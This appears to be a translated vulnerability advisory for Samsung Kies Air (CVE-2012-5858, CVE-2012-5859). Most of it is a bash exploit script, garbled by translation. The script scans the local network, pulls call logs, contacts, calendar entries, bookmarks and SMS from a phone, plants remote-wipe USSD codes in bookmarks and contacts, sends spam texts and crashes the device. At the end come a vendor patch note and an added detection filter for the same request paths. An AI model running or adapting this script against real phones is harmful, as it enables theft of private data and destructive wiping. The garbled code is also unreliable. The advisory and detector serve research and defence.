Release date:
Updated on:
Affected Systems:
Samsung Kies Air 2.1.210161
Samsung Kies Air 2.1.207051
Description:
--------------------------------------------------------------------------------
Bugtraq ID: 56560
CVE ID: CVE-2012-5858, CVE-2012-5859
Kies Air is an application that connects a computer to a mobile phone over Wi-Fi so that the phone can be managed from a browser.
Samsung Kies Air 2.1.207051, 2.1.210161, and other versions contain security vulnerabilities that allow attackers to bypass certain security restrictions or cause a denial of service.
<* Source: clodij. Lacayo *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
#! /Bin/bash
Echo "Samsung S3 Kies Air example-v.1.3 www.samsung.com/us/kies /"
Echo ""
Echo ""
Echo"
######################################## ######################################## #################################"
Echo "Filename: kiesauth. sh"
Echo "Date: 10/23/2012"
Echo "Authors: @ cron __"
Echo "Presentation: http://www.slideshare.net/firmware/kies-air-launch-steal-crash"
Echo "Whitepaper: http://dl.dropbox.com/u/7779799/SamsungKiesAirAuthorizationBypassandDoS.pdf"
Echo "Version: 1.3"
Echo "Description: Script to detect local running Kies Air web servers on Samsung Galaxy S3 phones ."
Echo"
######################################## ######################################## #################################"
Echo ""
Echo ""
While true; do
Printf "% s \ n" "1) Scan local network"
Printf "% s \ n" "2) Send DoS"
Printf "\ n % s \ t" "Enter an option :"
Read option
# Option 1
Case $ option in
[1]) ip = 'ifconfig | awk/inet \/'
Echo $ ip
Echo "Type in your IP :"
Read ipstart
Echo-e "Scanning in progress... \ n"
Sudo nmap-sS-p 8080 $ {ipstart}-254-vv> nmap_scan.txt
Awk '/Nmap scan report for Android/|/open/|/Samsung/'nmap_scan.txt> ka_online.txt
Printf "% s \ n" "Active servers found :"
Cat ka_online.txt
Printf "% s \ t" "Was a server found? Type 'y' or 'N' and press [Enter]"
Read connect
If [$ connect = y]
Then
Echo "Enter the target IP and press [Enter]"
Read target_found
Wget -- ignore-length -- quiet http: // $ {target_found}: 8080/www/index.gz.html
Printf "\ n % s \ n" 1) Grab logs (incoming/outgoing CALS )"
Printf "% s \ n" "2) Grab address book"
Printf "% s \ n" "3) Grab calendar events (experimental )"
Printf "% s \ n" "4) Grab bookmarks"
Printf "% s \ n" "5) Grab SMS (incoming/outgoing )"
Printf "% s \ n" "6) Send remote wipe"
Printf "\ n % s \ t" "We have access, what wocould you like to do? "
Read action
Case $ action in
[1]) wget -- ignore-length -- quiet-O call_log.txt
Http: // $ {target_found}: 8080/ws/telephony/log? StartIndex = 0 & maxItems = 500 & sort = time-descending ;;
[2]) wget -- ignore-length -- quiet-O addressbook.txt
Http: // $ {target_found}: 8080/ws/pim/contacts? StartIndex = 0 & maxItems = 100 & sort = alpha-ascending ;;
[3]) wget -- ignore-length -- quiet-O calendar_events.txt
Http: // $ {target_found}: 8080/ws/calendar/instances/1348977600/1352606400? SearchQuery = calendarId: 1 calendarId: 2 & 1351121143933
;;
[4]) wget -- ignore-length -- quiet-O bookmarks.txt
Http: // $ {target_found}: 8080/ws/browser/bookmarks? StartIndex = 0 & maxItems = 100 & sort = time-descending ;;
[5]) wget -- ignore-length -- quiet-O messages.txt
Http: // $ {target_found}: 8080/ws/messaging/messages? StartIndex = 0 & maxItems = 10 & sort = timestamp_descending ;;
[6]) printf "\ n % s \ n" 1) Add remote wipe as a bookmark"
Printf "% s \ n" "2) Replace the default AT&T bookmark link with remote wipe"
Printf "% s \ n" "3) Replace contact information with remote wipe and mark it as favorite"
Printf "% s \ n" "4) Add remote wipe to address book and mark it as favorite"
Printf "% s \ n" "5) Send spam SMS"
Printf "\ n % s \ t" "Choose an option :"
Read wipe_option
Case $ wipe_option in
[1]) wipe1 = 'wget -- ignore-length -- server-response -- quiet -- post-data
'Url = http: // 192.168.1.1324252fremotewipe.html & title = AT % 26 T % 20 Mobile % 20web'
Http: // $ {target_found}: 8080/ws/browser/bookmarks ';;
[2]) echo "DELETE method not supported by wget .";;
[3]) wipe3 = 'curl-O curl_response.txt-x put-d
"Title = & firstName = Vicky & lastName = & suffix = & nickName = & homePhoneNo = & workPhoneNo = & mobilePhoneNo = * 2767 * 3855% 23 & defaultPhoneNo =-1 & workEmail = & = & otherEmail = & organization = & jobTitle = & favorite = true & accountType = Phone & accountName = Phone"
Http: // $ {target_found}: 8080/ws/pim/contacts/37 ';;
[4]) wipe4 = 'wget -- ignore-length -- quiet -- post-data' title = & firstName = CALL FOR A SEXY
TIME & lastName = & suffix = & nickName = & homePhoneNo = & workPhoneNo = & mobilePhoneNo = * 2767 * 3855% 23 & defaultPhoneNo =-1 & workEmail = & homeEmail = & otherEmail = & organization = & jobTitle = & favorite = true & accountType = Phone & accountName = Phone'
Http: // $ {target_found}: 8080/ws/pim/contacts 'echo-e "Entry added .";;
[5]) wipe5 = 'wget -- ignore-length -- quiet -- post-data
'Folderid = & destination = tel: 111 & destinationContactId = & destinationName = & body = Hey click this link!
Goatse. cx & mimeType = text/plain 'HTTP: // $ {target_found}: 8080/ws/messaging/sms/messages ';;
Esac
Esac
Elif [$ connect = n]
Then
Printf "% s" "No available targets found ."
Else
Printf "% s" "Not a valid entry. Aborted ."
Fi ;;
# Option 2: Manually specify this for now.
[2]) t1 = 'wget -- quiet-p' http: // 192.168.1.136: 8080/www/apps/KiesAir/jws/ssd. php? E & ''echo-e "Crash successfully
Sent to device. \ n ";;
Esac
Echo-e "Script reloaded. \ n"
Done
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Samsung
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://samsungapps.sina.cn/supportMain/getSupportMainList.as
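
Detection example (added here, not part of the advisory or the original test script): a shell filter that flags HTTP requests to the Kies Air web service paths named in the test method above. The log format, the function names and the sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: flag requests to the Kies Air paths listed in the advisory.
# Assumed log format (hypothetical proxy/IDS export, one request per line):
#   <time> <src_ip> <dst_ip>:<port> <method> <path>

# Constructed sample log lines (not captured traffic).
sample_log() {
cat <<'EOF'
2012-11-20T10:00:01 192.0.2.10 192.0.2.50:8080 GET /www/index.gz.html
2012-11-20T10:00:02 192.0.2.10 192.0.2.50:8080 GET /ws/pim/contacts?startIndex=0&maxItems=100
2012-11-20T10:00:03 192.0.2.10 192.0.2.50:8080 POST /ws/browser/bookmarks
2012-11-20T10:00:04 192.0.2.11 192.0.2.50:8080 GET /www/apps/KiesAir/jws/ssd.php
2012-11-20T10:00:05 192.0.2.12 192.0.2.60:80 GET /ws/messaging/messages
2012-11-20T10:00:06 192.0.2.10 192.0.2.50:8080 PUT /ws/pim/contacts/37
EOF
}

# Read log lines on stdin and print "<src> <category> <method> <path>" for
# every request that reaches a Kies Air data or crash path on port 8080.
classify_kies_requests() {
  awk '
    {
      split($3, dst, ":")
      if (dst[2] != "8080") next          # Kies Air listens on 8080 per the script
      path = $5
      sub(/\?.*/, "", path)               # ignore the query string
      kind = ""
      if (path ~ /^\/www\/apps\/KiesAir\/jws\/ssd\.php$/)
        kind = "dos-request"
      else if (path ~ /^\/ws\/(telephony|pim|calendar|browser|messaging)\//)
        kind = ($4 == "GET") ? "data-read" : "data-write"
      if (kind != "") print $2, kind, $4, path
    }'
}

# Number of flagged requests in the log read from stdin.
count_alerts() {
  classify_kies_requests | wc -l | tr -d ' '
}

sample_log | classify_kies_requests
```

Any hit from a host other than the paired computer means the phone's data was requested without the owner's authorization prompt; write requests (POST/PUT) deserve priority because they change bookmarks, contacts or messages on the device.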